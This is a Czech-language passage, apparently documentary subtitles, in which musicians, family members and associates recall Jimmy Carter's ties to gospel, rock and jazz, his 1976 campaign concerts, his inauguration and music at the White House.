interpretů. Někdy se ve svatostáncích konaly celonoční gospelové zpěvy. Jazz a nejspíš i rock'n'roll mají kořeny mimo jiné i v gospelu. Jimmy Carter pochází z Georgie. Nikoli z Atlanty , ale z malého městečka dole na jihu. Takže bylo patrné, že přesně ví, oč se snažila například první dáma gospelu Shirley Caesar . Jimmy Carter chodíval do černošského kostela, kde zpíval s ostatními, aniž by potřeboval zpěvník. Znal všechny texty nazpaměť. Vyrůstali jsme na Mahalii Jackson. Její hlas zněl hojivě. Rock'n'roll možná získal přízvisko "ďáblova hudba" proto, že gospel byla tzv. božská hudba, od níž se rock odpoutal coby černá ovce rodiny. Na Jihu bylo všechno propojené. Zpívat jsem začala v tradičním chrámovém sboru, což bylo fajn. Současně jsem zbožňovala Elvise Presleyho , kterého taky ovlivnil gospel. Gospelová hudba vychází ze srdce, z hloubi lidského nitra. Ve Waycrossu se zpívá 24 hodin denně. Stejně tak v Bonifay na Floridě . Omluvili jsme se jim, že to kvůli nám museli zkrátit. Mezi chrámovými písněmi, které převládaly v bělošských kostelech, a písněmi, jež se zpívaly v afroamerických, existovala báječná kompatibilita. Hudba bořila bariéry mezi lidmi nejen z geografického, ale i rasového hlediska. Na téhle muzice jsem vyrostl, protože ji táta poslouchal. Byli jsme liberálové, nikoli rasisti. Což znamenalo, že jste v Plains měli asi tak dva kamarády. Vyrůstal v oblasti, kde žilo 80% černochů. Dokud neodešel k námořnictvu, neměl pravděpodobně žádné bělošské kamarády. Byla to výjimečná situace, něco nevídaného. " Plains . Bělošští průkopníci válčili, aby získali půdu indiánů, které vyhnali na Západ, aby tam umřeli. Naše rodiny se tehdy přistěhovaly, aby obsadily zvlněné planiny, podle nichž dostalo jméno i město. Žilo tu na 500 duší, bělochů i černochů, pánů i otroků. Ani jedna ze stran nezapomněla na to, jakými metodami se ti druzí snažili dosáhnout svých cílů." "Ale dnes, když jsme si všichni rovni a máme možnost společně zažívat vzestupy i pády, jsme se naučili, že se musíme spoléhat jeden na druhého. I když je naše město malé, považujeme ho za své útočiště a přátelský domov a nedovolíme, aby sváry nebo roztržky ukončily všechny naše skromné sny." To je nádhera. Moje rodina farmařila v Georgii přes 200 let a v tomhle kraji žijeme už asi 150 let. V našem domě až do mých teenagerovských let nebyla tekoucí voda ani elektřina. Získal jsem technické vzdělání. Nikdo z mých předků neměl šanci dokončit ani střední školu. Vždycky jsme se živili prací. Nikdy jsem mu nenaplácala. Malý Jimmy ode mě nikdy nedostal výprask. Možná jsem mu vlepila menší pohlavek. Ale nařezáno nikdy nedostal. To jsem nechávala na jeho otci. Měli jsme rádio na baterky. Táta hlídal, na kolik hodin denně jsme ho zapínali, aby se baterky nevybily. Občas jsme chytali stanice z Nashvillu a z Chicaga a poslouchali country. Nebo jsem poslouchal čtvrt hodiny Glenna Millera . Byl to v podstatě můj jediný kontakt s okolním světem. Dívám se na velké skladatele, kteří tu byli přede mnou, a chápu, jak měnili společnost. Jak mi kdysi sdělil Harry Belafonte , umělci jsou strážci pravdy. Naprosto mu rozumím. Hrál váš otec na nějaký nástroj? Na hifi věž. Na tu hrál fakt dobře. I když jsme byli bez peněz, utratil 600 dolarů za nejlepší audiosystém v Plains v Georgii . Zvuk z těch obrovských beden vás málem porazil. Fantazie. Dovolil mně a bráchům pouštět si na něm naši muziku. Poslouchal ji s námi a snažil se přijít na to, o co nám jde. Byl to jeden ze způsobů, jak udržovat kontakt s dětmi. Vítáme zvláštního hosta, bývalého senátora a kandidáta na guvernéra Jimmyho Cartera . Vystřídal jsem v guvernérském sídle Lestera Maddoxe . Jeho symbolem byla násada od krumpáče, kterou vyháněl afroamerické zákazníky ze své restaurace. Chlubil se tím. Byl neochvějným zastáncem segregace. Z politického hlediska to byla těžká doba. Na střední škole mě každý den bili, protože jsem odmítal odsuzovat Afroameričany. Roztrhli mi košili. Vrátil jsem se domů a máma mi přinesla novou, kterou jsem měl nosit po zbytek pololetí. Vážně zlé časy. Po dlouhá léta Jih zatvrzele propagoval segregaci a řekněme i rasismus. Jižani byli proti černochům. Když jsem nastoupil do guvernérského sídla, vyvěsil jsem prakticky okamžitě v kanceláři portrét Martina Luthera Kinga, nositele Nobelovy cenu míru. Jediný držitel Nobelovy ceny míru z Georgie. Doktor King upřednostňoval blaho svých bližních. Požadoval, aby země řešila nerovné postavení černochů a chudých lidí všech barev pleti. Jimmy Carter byl v oblasti občanských práv vůdčí osobností. Patřil k nové generaci naprosto skvělých jižanských guvernérů. Tím nejlepším, co kdy Jih potkalo, bylo přijetí zákona o občanských právech. Menšiny mohly od té doby volit, pracovat, koupit si dům, vzdělávat se, cestovat, a to na základě rovnosti a v souladu s jejich vlastním rozhodnutím. Byli tam Jižané, z nichž mnozí studovali na univerzitách a pak se vrátili domů. Založili bipartijní expertní skupiny, nazývané "Freedom Riders". Na jihu proběhly prakticky dvě dekády tzv. "období Kamelotu", jehož byl Carter součástí. Jimmy Carter reprezentoval nový Jih. Představoval naději pro Jih, kde, jak zpívali staří otroci, "bude dost místa pro všechny děti Boží". Přesně tohle ztělesňoval. Georgia je velice zajímavé místo. Jako černošský muzikant si nemůžete pomoct, protože vás ovlivňují texty Jamese Browna . Například: "Jméno tohoto místa, dobrý Bože, je Augusta, Georgia." Tenhle stát má úplně jinou povahu a atmosféru. Hudba dokáže promlouvat na více úrovních. To znamená prostřednictvím, textů, které obsahuje. Pak existuje ještě hlubší stránka, která oslovuje určité části vašeho mozku, nebo lépe řečeno duše. Vstupovali jsme do nové éry. Allman Brothers byli integrovaná kapela, protože na bicí hrál Jaimoe. Toho, oč se Carter snažil politicky, jsme se my pokoušeli dosáhnout pomocí muziky. Tenkrát frčel hlavně rock, ale kvůli politice jsme všichni holdovali folku. Když jsem byl guvernérem a moji synové bydleli se mnou v guvernérském sídle, všude hrála hudba Boba Dylana . Jeho písničky nás sblížily. Chip znal nazpaměť texty všech skladeb, které Bob Dylan napsal. Vzpomínám si, jak jsme se pohádali a já s ním přes rok nemluvil. Přes rok jsme spolu komunikovali prostřednictvím třetí skladby na druhém albu Boba Dylana , aniž bychom spolu skutečně mluvili. Bob Dylan vystupoval v Atlantě . Jako guvernér jsem ho pozval do guvernérského sídla. Bob Dylan mě poctil tím, že mě požádal o soukromý rozhovor. Položil mi jedinou otázku, týkající se mé křesťanské víry. Ptal se, co pro mě znamená a co považuju za její základní principy. Když jsem Jimmyho poprvé potkal, začal okamžitě citovat moje písničky. Tehdy mi poprvé došlo, že moje skladby v podstatě zasahují do světa establishmentu, aniž bych s touhle sférou měl nějaké zkušenosti. Nikdy jsem k ní nepřistupoval z téhle pozice. Takže mě to trochu znepokojilo. Uklidnil mě tím, že mě neshazoval a dával mi upřímně najevo, že moje písničky uznává. Je to moje spřízněná duše. Takového člověka nepotkáte každý den. Máte štěstí, pokud ho vůbec potkáte. Bob patří k mým nejlepším přátelům, stejně jako Willie Nelson . Zřejmě si s Bobem mohli vyměnit spoustu zajímavých postřehů, protože pocházeli z úplně jiných míst. Kdežto já pocházím v podstatě ze stejného místa jako Jimmy . Pozvali nás na večírek, který guvernér Carter pořádal pro Boba Dylana . Dorazili jsme tam právě ve chvíli, kdy odcházel poslední host. Bob Dylan s kapelou odešli, takže jsem se mohl převléknout do domácího. Na zápraží stál nějaký chlápek a měl na sobě staré děravé levisky. Neměl košili. Ani boty. Napadlo mě: "Jak se může tenhle hejsek potloukat v sídle guvernéra? Byl to Carter. Měl tam plnou láhev skotské J&amp;amp;B. Vypili jsme ji skoro celou a pak nám oznámil: "Budu váš příští prezident." Šel jsem si dát na zápraží s Greggem skleničku. Na láhev skotské si nevzpomínám. Tehdy jsem pil tak jednu skleničku vína nebo whisky denně. Gregg trochu přehání. Byl v pohodě, líbila se mu naše muzika, byl autentický a spřátelili jsme se. Zítra odpoledne zahajuje v Občanském centru oficiálně svou prezidentskou kampaň Jimmy Carter . Volební štáb Jimmyho Cartera , co si přejete? Phil Walden, manažer kapely a vlastník Capricorn Records, oznámil, že Carter přijede na akci, kterou jsme nazvali Capricorn Picnic and Summer Games. Přišla tehdy spousta zajímavých slavných lidí. Bill Graham z hudební branže. Objevil se i Andy Warhol . A najednou se zjevil i guvernér Carter. Jako republikán demokratovi, coby prezidentovi vám pomůžu. Skvělá nabídka, díky. Phil přišel za kapelou a povídá: "Hele, Carter bude kandidovat. Potřebuje peníze a podporu. Byli byste ochotní pro něj uspořádat benefiční koncert?" Je to velký hudební nadšenec. Jednou večer přišel na nahrávání. Spřátelil se s muzikanty, projevoval opravdový zájem a oni to vycítili. Zavládla nálada ve smyslu: "Páni, to je super chlap, skvělý guvernér Georgie. Jižan. Zažili jsme Nixonovu éru a viděli, kam to vedlo. "Není načase, aby se úřadu ujal nějaký bezúhonný a slušný člověk? Má vážně šanci?" Upřímně řečeno, brali jsme to tak, že šance má mizivé, ale že to za pokus určitě stojí. Guvernére Cartere, především vám děkuji, že jste si na mě udělal čas. Vím, že se hodně zajímáte o rockovou muziku. Ano, zajímám. A nejen z hlediska toho, co pro naši společnost znamená. Zároveň mě i baví. Koho posloucháte nejradši? Třeba lidi, které jsem poznal osobně při nahrávání v Georgii: Marshall Tucker Band, Charlieho Danielse a Allman Brothers . Chci svým i vašim přátelům, kteří mi tak jako vy pomohou ke zvolení, představit skvělé Allman Brothers! Když jsme pořádali první koncert v Providence na Rhode Islandu , neřešili jsme, že jde o politickou benefici. V první řadě to byl koncert pro naše fandy. Chip přišel na koncert a prohlásil: "Nikdo nás neznal, ale vy jste nás zviditelnili." Byl jsem prakticky neznámý, zato Allman Brothers znal každý hudební nadšenec. Když mě podpořili, fandové si řekli: "Když mají Allmani rádi Cartera, tak ho musíme volit taky." Každého, kdo by uspořádal koncert pro Jimmyho , jsme vítali s otevřenou náručí. Vystupovali pro nás Hank Snow , Toots and the Maytals, John Denver , prostě celá plejáda muzikantů. Vybrali jsme dost peněz. Ve Foxu zahráli Allman Brothers , Marshall Tucker Band v Providence a později Charlie Daniels zase ve Foxu . To Carterovi vyneslo značnou věrohodnost a spoustu peněz. Tehdy byla novinka, že jste mohli získat finanční prostředky ze soukromých zdrojů. Jakoukoli částku bylo možné dorovnat federálními příspěvky. Mohli jsme ty peníze dále využívat. Když se třeba v sobotu konal koncert, mohli jsme si příští týden zaplatit televizní reklamu v Pensylvánii . Věřím v lidi, v rovné příležitosti a ve svobodu. A budu za ně bojovat. Volte Jimmyho Cartera . Pro změnu skutečného lídra. Požádáš rodiče a sousedy, aby mě volili? Moji oponenti připravili plán s názvem "Kdokoli kromě Cartera". Chtěli vyslat do daného státu svého nejlepšího člověka, který by vystupoval proti mně. Následně by ho podpořili i ostatní kandidáti. Demokratická strana byla etablovaná ve Washingtonu a Jimmy byl outsider. A nejen to, navíc Jižan. Byl z Georgie! Už to samo o sobě stačilo. S ohledem na situaci se snaha ucházet se coby Jižan o prezidentský úřad rovnala rozsudku smrti. Vymanili jsme se z éry Watergate a chtěli jsme se znovu stát bezúhonnou zemí. Určitě to platilo i v černošských komunitách, ze kterých jsem vzešel. Díky tomu si nás okamžitě získal. Zatímco Jerry Brown usiluje o hlasy voličů na venkově v Marylandu , Jimmy Carter se zaměřil na získání podpory úředníků a černošských vůdců v Baltimoru . Největší konfrontaci jsem měl s Jerrym Brownem . Vybrali ho, aby proti mně kandidoval v Marylandu , protože platil za pana Slušňáka. Domnívali se, že právě v téhle oblasti získá podporu. Myslím, že jsme připraveni přinést do Washingtonu nový impuls. Pokud Maryland vyšle zbytku země správný signál, přesně to se i stane. Pomůžete nám? Moc vám děkuji! A teď si poslechněte muziku. Je to něco jako benefiční večeře. Někteří si dají kuře s hráškem, bramborovou kaší a omáčkou. Jiní si radši poslechnou Eagles, Chicago a Lindu Ronstadt . Vzpomínám si, jak Jerry Brown vstoupil do volebního klání a přitáhl s sebou Lindu Ronstadt a Eagles. Vypukl souboj kapel. Žádný souboj nevypukl. Zabalili jsme to, protože pro Browna bylo pozdě. Akorát mě štvala ta věc s Eagles. "Sakra, jak jsme to mohli přehlédnout?" Ale tím to haslo. Žádná rivalita mezi námi nepanovala. Nechtěli jsme se porvat s Eagles. Někteří z nás Jerryho Browna obdivovali. Byl to fajn chlap. Ale náš byl lepší. Brown se mi líbil. Lindu jsem zbožňovala. Ale nevěřila jsem mu. Prostě ne. Upřímně řečeno, neměl tu správnou šťávu. A nepomohlo mu ani to, že si přivedl Eagles. V Oregonu jsem uspořádal několik akcí, na něž přišlo jen málo lidí. Jimmy Buffett mi předtím přislíbil pomoc. Tak jsem ho poprosil, zda by v Oregonu nevystoupil. Věděl jsem, že přiláká davy. Ke kampani jsem se připojil v Portlandu v Oregonu . Neměli tam odpovídající aparaturu. Takže jsme popadli akustické kytary. Tehdy jsme byli v Oregonu a ve státě Washington dost populární. Sešlo se odhadem 15 tisíc lidí. Hráli jsme venku. Jerry Brown měl přede mnou náskok, ale díky Jimmymu Buffettovi jsem dopadl docela dobře. Rockový aspekt kampaně spočíval v první řadě v získání peněz. Za druhé šlo o snahu oslovit mladší generaci a představit jí někoho, kdo je dostatečně moderní, aby jí rozuměl. Rolling Stone se do celostátní politiky zapojil ve volbách v roce 1972, kdy McGovern kandidoval proti Nixonovi. Hunter Thompson měl na starosti téma prezidentských voleb. V letech 1974-75 byl v Georgii a slyšel projev Jimmyho Cartera na takzvaném Dni práva. Hunter Thompson seděl vzadu v publiku, protože přišel s Tedem Kennedym . Chodil si pro ledový čaj, do kterého si přiléval whisky. Můj projev na něj každopádně udělal velký dojem. V Atlantě odstrčil Teddyho Kennedyho. Nikdy předtím jsem neviděl, aby do Kennedyho kdokoli kdekoli strkal, což mě ohromilo. Nezažil jsem žádného jiného politika, který by tohle udělal. Prostě odstrčil Teddyho stranou. "Uhni, mám práci." Kennedy jen zíral. Já taky. Hunter Thompson u nás s Rosalynn strávil tři večery a následně jsme se spřátelili. Během kampaně usoudil, že dostane možnost udělat se mnou rozhovor jako první, protože jsme se znali z dřívějška. Moje tisková mluvčí Huntera neustále odsouvala se slovy: "Musíte počkat, až na vás přijde řada." Následně se Hunter jednou v hotelu opil, vysypal jí před dveře několik popelnic a zapálil je. Přišel Jimmy Carter a podpořil ho Hunter. Takže se k němu zákonitě začali hlásit mladí a podpořily ho jedny z nejslavnějších a nejvýznamnějších osobností rockového světa, konkrétně Allman Brothers . Všichni mluvili jazykem rockové éry. Carterova spřízněnost s rockem, který byl hudbou změny, disidentů, hippies a huličů trávy, s sebou nesla určité politické riziko, ale jemu to bylo jedno. V té době hoši hodně experimentovali s různými drogami. Gregg měl kontakt, který přes prostředníka sháněl od jistého lékárníka farmaceuticky vyráběný kokain. Všechny je chytili. Pak se obrátili na Gregga a řekli: "Dobrá, poskytneme vám imunitu, ale to znamená, že budete muset vypovídat. Pokud vypovídat nebudete, pošleme vás do vězení, dokud si to nerozmyslíte." Těžká situace. Dovedete si představit, v jaké pozici se Gregg nacházel. Nechtěl udat kamaráda, a přitom musel svědčit. Jinak by zkrátka skončil na bůhvíjak dlouho za mřížemi. Soud začal, Gregg vypovídal. Prostě bouřlivé období. A nešlo jen o zatčení za drogy. Allmani už tehdy byli spolu delší dobu a podle mě si to na nich vybralo svou daň. Nastal čas si dát pauzu. Ukázkovým příkladem jeho dobrosrdečnosti byla skutečnost, že zatímco zbylí členové kapely se obrátili proti Greggovi , Jimmy to neudělal. Bral to jako příležitost pomoct člověku, který se ocitl na dně. Dokážete si to představit? Kandidoval na prezidentský úřad. Klidně mohl říct: "Sorry, Greggu , sorry, Allmani . Tohle riziko nemůžu podstoupit. Obrátím se jinam. Mám vás rád, kluci, ale sbohem." Ale neudělal to. K nikomu z nás se neotočil zády. Jako kluk jsem měl problémy s drogami. Otec mi pomohl. Během kampaně mě zaměstnal jako svého řidiče. Nikoho neodsuzuje. Vůbec nehodnotí, co děláte jako soukromá osoba. Chce jen, abyste byli sví. Greggův případ byl dobrou ukázkou tohohle postoje. Měl jsem velice radikální názory. Bylo to něco jako zkouška dospělosti. Začnete jako mírumilovný hipík a pak jste stále radikálnější a radikálnější. Nakonec jsem se ocitl ve Straně černých panterů. Když Carter kandidoval, díky kampani jsme nabyli dojmu, že máme někoho, kdo začíná vidět svět tak, jak ho vnímáme my. Muž, kterého uznávám a věřím v něj, pravil: "Vždycky jsem někam patřil." Takže guvernére, stojím zcela při vás! Náš národ byl svědkem selhání vedení. Poškodilo nás to a rozčarovalo. Viděli jsme, jak mezi námi a vládou vyrůstá zeď. Přišli jsme o řadu hodnot, které historicky náš národ a vládu stmelovaly. Nyní je čas na nápravu. Chceme opět věřit. Chceme být opět hrdí. Chceme znovu znát pravdu. Je čas, aby vládu vedl lid, a nikoli naopak! Příští první dáma Spojených států , paní Rosalynn Carterová. Děkuji mnohokrát. Od dubna loňského roku jsem vedla kampaň po všech státech. Seznámili jsme se s celou zemí. A celá země se seznámila s námi. Kampaň stmelila mou rodinu. A pevně věřím, že moje rodina může stmelit tuto zemi. V roce 1976 jsem poprvé mohla volit a hrdě jsem dala svůj hlas Jimmymu Carterovi . Moje nevlastní matka June Carterová trvala na tom, že je Jimmyho sestřenice. Ačkoli jsem nedokázala vyhledat patřičnou větev na rodovém stromě, jsem si jistá, že je to pravda. Takže jsme ten den odvolili. Večer ještě nebyly známy výsledky. Šla jsem spát, aniž bych věděla, jak to dopadlo. Kolem páté ráno mě vzbudili táta a June , když začali ječet a hulákat: "Vyhrál! Vyhrál! Vyhrál!" Byli ohromně nadšení. Chodila jsem do šesté třídy a vzpomínám si, že to byla velká událost. Jako holka jsem snila o tom, že budu zpěvačka. Vyrůstala jsem Georgii, takže jsem sledovala, jestli se někdo z mého státu proslaví. Poslouchala jsem Otise Reddinga a Allman Brothers , kteří v Georgii nahrávali. Takže to, že prezident pocházel z našeho státu, bylo jakýmsi potvrzením, že můžete dokázat cokoli. Po zvolení Jimmyho Cartera z Georgie prezidentem Jižani málem praskli pýchou. Nedokážete si ani představit, o jak významnou událost se jednalo a jakou míru hrdosti to v nás vyvolalo. Guvernére Cartere, jste připraven složit ústavní slib? Ano, jsem. Levou ruku položte na Bibli, pravou zdvihněte a opakujte po mně: Já, Jimmy Carter , slavnostně přísahám že budu čestně vykonávat že budu čestně vykonávat funkci prezidenta Spojených států . funkci prezidenta Spojených států . A podle svých sil A podle svých sil budu zachovávat, střežit a bránit budu zachovávat, střežit a bránit ústavu USA . ústavu USA . K tomu mi dopomáhej Bůh. K tomu mi dopomáhej Bůh. Blahopřeji. Dámy a pánové, prezident Spojených států . Za sebe i za celý národ chci poděkovat svému předchůdci za vše, co udělal pro uzdravení naší země. "Chtěl jsem sdílet svět svého otce. Tuto bolest většinou skrývám, ale pouta krve nebo potomstva přetrvávají a dosud cítím uvnitř touhu po jeho natažené ruce. Po mužském objetí, při němž bych se ocitl v jeho náruči. Přání pouhých několika slov chvály. Z těch vzácných okamžiků, kdy jsme přece jen překročili most mezi námi, přežívá čirá radost. Nezapudil jsem onu dávnou chlapeckou nevraživost, dokud jsem se svými vlastními syny nesdílel jeho poslední hodiny a nepoznal, čím se stal nebo čím vždycky byl. Otcem, který pro mě osobně nikdy nepřestane žít." Když jsme pořádali inaugurační koncert, otevřela se opona a před námi stál John Wayne . Schoval jsem si kartičku s nápovědou. A s jeho podpisem. Stojí na ní: "Ahoj, jsem John Wayne ." Dobrý večer. Jsem John Wayne . Přišel jsem dnes večer vzdát hold našemu 39. prezidentovi, našemu novému vrchnímu veliteli. Přeji vám, pane, hodně štěstí v neprobádaných vodách, které máte před sebou. Patřím k loajální opozici. Zdůrazňuji, že "loajální". Nic jiného bych ani nepřipustil. John Wayne byl báječný. V mnoha politických otázkách jsme se neshodli, ale nebýt jeho, patrně by se nepodařilo prosadit smlouvu o Panamském průplavu. Přátelil se totiž s panamským prezidentem. Mluvil se všemi republikány, obvolal všechny senátory a snažil se je přimět, aby hlasovali s námi. Pokud jste tehdy věřili ve společný cíl, všichni přiložili ruku k dílu. Na závěr bych se chtěl připojit k milionům lidí na celém světě, kteří vám přejí vše dobré, pane prezidente. Žádáme vás jen o jediné. Abyste udržel tento národ pod Boží záštitou a zachoval svobodu a spravedlnost pro všechny. Víme, pane prezidente, že to dokážete. Děkuji. Byl to opravdu příjemný večer. Všichni mu to přáli a překvapilo je, že se dostavil John Wayne . To, že mě požádal o vystoupení, byla pro mě čest. Rád bych tuhle písničku věnoval Jimmymu Carterovi v naději, že snad nyní nastává doba spravedlnosti a důstojnosti. Paul Simon a Aretha Franklin patří k mým nejoblíbenějším umělcům. Když jsem chystal seznam účinkujících, byli na prvním místě. Během inauguračního večera jsme museli zavítat asi na 10 míst. Na všech z nich jsme si s Rosalynn zatančili. Díky, že jste mi pomohli, abych se stal prezidentem té nejskvělejší země světa. Bavíte se? My rovněž. V hloubi srdce věřím, že jsme mu pomohli stát se prezidentem. Ostatně jako spousta dalších lidí. Každopádně jsme v tom měli prsty. Gregg Allman byl jedním z prvních lidí, které jsem po nástupu do funkce pozval do Bílého domu. Přivedl i Cher. Byl jsem na první večeři v Bílém domě. Ukazovali lidem, kam mají dát lžíce a talíře atd. A přinesli misky na opláchnutí prstů. Protože pocházíme z Plains , netušili jsme, jak se používají misky na omytí prstů. V Bílém domě nám přinesli křišťálovou misku s vodou a lístkem citronového muškátu. Čeká se, že si tím listem otřete prsty a opláchnete si je v misce. Jenže tam seděli i hosté, kteří misku nikdy nepoužívali, například Gregg a Cher . Cher vzala misku a napila se z ní. Plaval v ní citronový muškát. Seděli jsme tam a povídali si. Když všichni dojedli, omyli jsme si ruce v miskách a pak jsme přešli k dalšímu chodu. V Bílém domě se skvěle žilo a hudba byla báječná. Do Bílého domu přicházeli různí umělci, někdy i bez ohlášení, a prezidentská kancelář nevěděla, co s nimi. Třeba zavolali a povídají: "U vchodu jsou Crosby, Stills a Nash, ale nemají naplánovanou schůzku. Můžete se o ně postarat?" Měl jsem kancelář v Západním křídle v suterénu. Nakonec jsem je vzal k prezidentovi. Bylo to poprvé, kdy se mladí lidé dostali svým způsobem k vládnutí. Po Nixonově éře šlo o přelomovou záležitost. Rádi poslouchali rock a nedělali to jen tak na efekt. Když jsme přišli do Bílého domu, vítali nás tam. Bylo to docela komické, protože jsem chodil o berlích. Zrovna jsem byl na Jamajce , kde mě zatkli. Když mě pak pustili, měl jsem takovou radost, že jsem seskočil z verandy a vyvrtl si kotník. Druhý den jsem pak musel jít k prezidentovi. Fakt srandovní. Hodně jsme se nasmáli. Prezident Carter má encyklopedické znalosti o veškeré hudbě, nejen o rocku. Má hluboké, podrobné znalosti klasické hudby, ale zároveň toho hodně ví o blues a o jazzu. Když jsem dostal příležitost zahrát v Bílém domě, byl to pro mě coby pro jazzmana jeden z nejpohnutějších životních okamžiků. V Bílém domě se tehdy pořádalo asi nejvíc koncertů v historii. Nejradši vzpomínám na ty jazzové. Kouzelné okamžiky. Jazzmani mě neskutečně uchvátili. Proto mi bylo ctí a potěšením pozvat do Bílého domu osobnosti, kterým se v minulosti často nedostávalo uznání za jejich přínos společnosti. Existuje-li nějaká původní umělecká forma, která je pro Spojené státy specifická a výjimečná a naši zemi charakterizuje, je to podle mě jazz. Lidé z takzvaných seriózních kruhů podle mě zpočátku nebrali jazz příliš vážně. Možná v tom sehrál určitou roli prvek rasismu. Většinu slavných interpretů totiž představovali černoši a zejména na Jihu bylo vyloučeno, aby černošští a bělošští hudebníci hráli spolu. Věřím, že právě tato umělecká forma se zasloužila o prolomení těchto bariér a umožnila nám prožívat, rozvíjet a hrát tuto úžasnou muziku společně. Přišli třeba Cecil Taylor and Chick Corea . Vzpomínám na Charlieho Minguse v kolečkovém křesle, jemuž všichni tleskali. Bylo úžasné, že se tam objevil. Prezident přistoupil k Mingusovi a pevně mu tiskl ruku. Mingusovi jsem řekl něco ve smyslu: "Vážím si toho, co jste svou hudbou dokázal vykonat pro naši zemi, naše lidi i pro mě osobně." Pan prezident, jeho výsost, nás požádal, abychom spustili stejnou skladbu, kterou už jsme v Bílém domě zahráli předtím. Má název "Salt Peanuts". Ale jsou s tím spojeny určité diplomatické závazky. Totiž, aby sám pan prezident, jeho veličenstvo osobně, zazpíval text. Dizzy Gilespie mě požádal, abych zazpíval "Salt Peanuts", což je velmi netradiční skladba. Byl to tuším jediný případ, kdy mi New York Times během působení v Bílém domě blahopřály, že dobře držím rytmus. O zpěvu pomlčely. Počkat, moment! Mám ještě otázku. Vyrazíte s námi na turné? Po dnešku klidně. Prezident Carter zbožňoval jazz. Rád poslouchal všechny hudební žánry, ale jazz doopravdy miloval. Odjakživa jsem zastávala názor, že hudba, především pak jazz, je naším nejlepším velvyslancem, protože si ho lidé spojují s Amerikou a jde o výjimečný styl. Hudba je jednou z nejsilnějších zbraní takzvané "měkké síly". Měkká síla znamená mimo jiné využití kultury. Jimmy Carter to dokonale chápal, hlavně proto, že byl hudební nadšenec. Pomocí hudby se mu dařilo prosazovat svou politiku. Často ji používal k pobavení kongresmanů na různých akcích, pořádaných na trávníku Bílého domu, což dříve nebývalo zvykem. Procházeli jsme davem a oslovovali určité kongresmany, do jejichž kanceláří bychom se nikdy nedostali. Tady jsme s nimi mohli mluvit 20-30 minut. Vzpomínám si na jednu významnou událost, kdy prezident uspořádal akci NASCAR. Nepřijel mu zazpívat nikdo jiný než Willie Nelson . Opět se to konalo venku na jižním pozemku Bílého domu. Přijely tam závodní vozy, nechyběli významní závodníci té doby. Členové Kongresu to doslova hltali. Máti měla na starosti všechny společenské akce, které se v Bílém domě odehrávaly. Takže když chtěli uspořádat koncert, matka zařizovala a domlouvala všechno okolo toho. Chci jen říct, že jsem si užila nádherný večer. Mohl být ještě lepší, kdyby tu byl Jimmy a slyšel vás, Willie , s vaší kapelou. Když Willie Nelson vystupoval v Bílém domě, prezident Carter trávil neplánovaně 13 dní v Camp Davidu s Beginem a Sadatem. Je mi líto, ale musím se vrátit do Camp Davidu. Můžu dodat pouze následující. Všichni víte, o jak důležitý summit se jedná a kolik je toho v sázce. Chci vás dnes večer požádat, abyste se i nadále modlili za Jimmyho , za premiéra Begina a za prezidenta Sadata. Modlete se za ně i za ty, kdo je provázejí, aby summit dopadl úspěšně. Dobrou noc. Pokud jste někdy četli historii rozhovorů v Camp Davidu mezi Beginem a Sadatem, je to strhující příběh o tom, kolikrát chtěla každá ze stran jednání opustit. Carter tam byl se svou ženou a celý summit řídil. Pendloval od jednoho k druhému a řešil nejen politické, ale i personální otázky. Právě takový přístup je zapotřebí k tomu, abyste usmířili lidi, kteří se celý život nenáviděli. Dostala jsem specifický úkol v rámci zahraniční politiky Carterovy administrativy. Přiznám se, že když jsem seděla ve Washingtonu , zatímco všichni jednali v Camp Davidu, měla jsem docela nervy na pochodu. Lidé se totiž neustále ptali: "Kdy už se z těch hor vrátí?" Strávili tam několik týdnů. Oba tyhle chlápky odvezl do hor do Camp Davidu a takříkajíc je tam uvěznil. Běhal od jednoho k druhému a málem se mu to rozpadlo pod rukama. Pak to začalo vypadat slibně. Carter si uvědomil, že se mu v Camp Davidu podaří dojednat dohodu mezi Egyptem , státem s největší armádou na Blízkém východě , a Izraelem . Prezident Carter využil své znalosti problematiky a odhodlání jednat s lidmi velice otevřeně, aby dosáhl výsledku. Skvěle se dovedl vžít do situace druhých, aby porozuměl tomu, oč usilují. Šance na uzavření mírové smlouvy mezi Sadatem a Menachemem Beginem byla mizivá. Řada jeho poradců na mezinárodní vztahy mu radila: "Nedělejte to." Carterovi se ovšem naskytla příležitost. Věděl, že má šanci uspět, takže do toho šel. Dámy a pánové, prezident Spojených států , prezident Egyptské arabské republiky a předseda vlády Izraele . Z hloubi duše věřil v úspěch a dosáhl nejdůležitějšího a jediného průlomu v otázce řešení situace na Blízkém východě . Dnes večer máme tu čest být svědky významného úspěchu při prosazování míru. Prezident Carter usiloval o prosazování morální zahraniční politiky. Chtěl reprezentovat naši oddanost lidským právům a americký hodnotový systém. Snaha o dodržování lidských práv na celém světě byla jedním z jeho základních principů národní bezpečnostní politiky. Prosazoval to nejlepší z amerických ideálů. Lidská práva. Právo žít jako člověk. Právě to se snažil prezident Jimmy Carter ve své zahraniční politice prosadit. V určitých částech světa to sice bylo problematické, ale alespoň se o to pokoušel. Poslal mě do Afriky se vzkazem na utrženém kousku papíru. "Chci, abyste se zeptal afrických vůdců, co očekávají od této administrativy a jak jim můžeme pomoci." Převratná věc. S příchodem nového roku se otevírá nová a kontroverzní kapitola amerických vztahů s Asií . Dnes ráno byla ve Washingtonu na budově čínského velvyslanectví poprvé vztyčena vlajka Čínské lidové republiky . Ceremoniál je jedním z řady dalších, které ohlašují zahájení formálních vztahů s Pekingem . Pokud jde o otevření se Číně , prezident Carter navázal na to, co připravil republikánský prezident. Právě tato skutečnost stojí za zmínku, vzhledem k tomu, jaká atmosféra v poslední době v této otázce panuje. Přišel čínský velvyslanec a prezident Carter se jako obvykle zeptal, zda pro něj může něco udělat. Velvyslanec odpověděl: "Ano. Rád bych jel do Nashvillu ." Prezident mě požádal, abych cestu zorganizoval. Byl to velkolepý víkend. Nashville na žádost Jimmyho Cartera rozvinul červený koberec pro prvního velvyslance Čínské lidové republiky . Začalo to obědem všech vedoucích pracovníků z hudebního průmyslu, kteří se sešli v konferenční místnosti BMI. Po obědě se otevřely dveře, kde stála Barbara Mandrell s doprovodnou skupinou a zazpívala "Sleeping Single in a Double Bed". Tlumočník vysvětloval velvyslanci, o čem zpívá, a ten umíral smíchy. Víkend zakončila nedělní pozdní snídaně. Přišla Minnie Pearl, Johnny Cash s June . Vzpomínám na to, jak zazvonil zvoneček, a ozvalo se: "Podává se sní</t>
  </si>
  <si>
    <t>29740</t>
  </si>
  <si>
    <t>20241001_29_2997671847_d67f59f284fd60a71792.html</t>
  </si>
  <si>
    <t>d67f59f284fd60a71792</t>
  </si>
  <si>
